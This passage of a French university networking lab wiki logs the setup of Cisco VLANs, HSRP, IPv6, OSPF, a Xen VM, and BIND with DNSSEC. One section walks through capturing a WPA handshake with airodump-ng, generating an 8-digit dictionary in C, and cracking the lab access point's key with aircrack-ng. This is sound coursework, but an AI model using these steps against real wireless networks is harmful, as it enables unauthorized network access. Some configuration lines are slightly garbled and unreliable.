  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
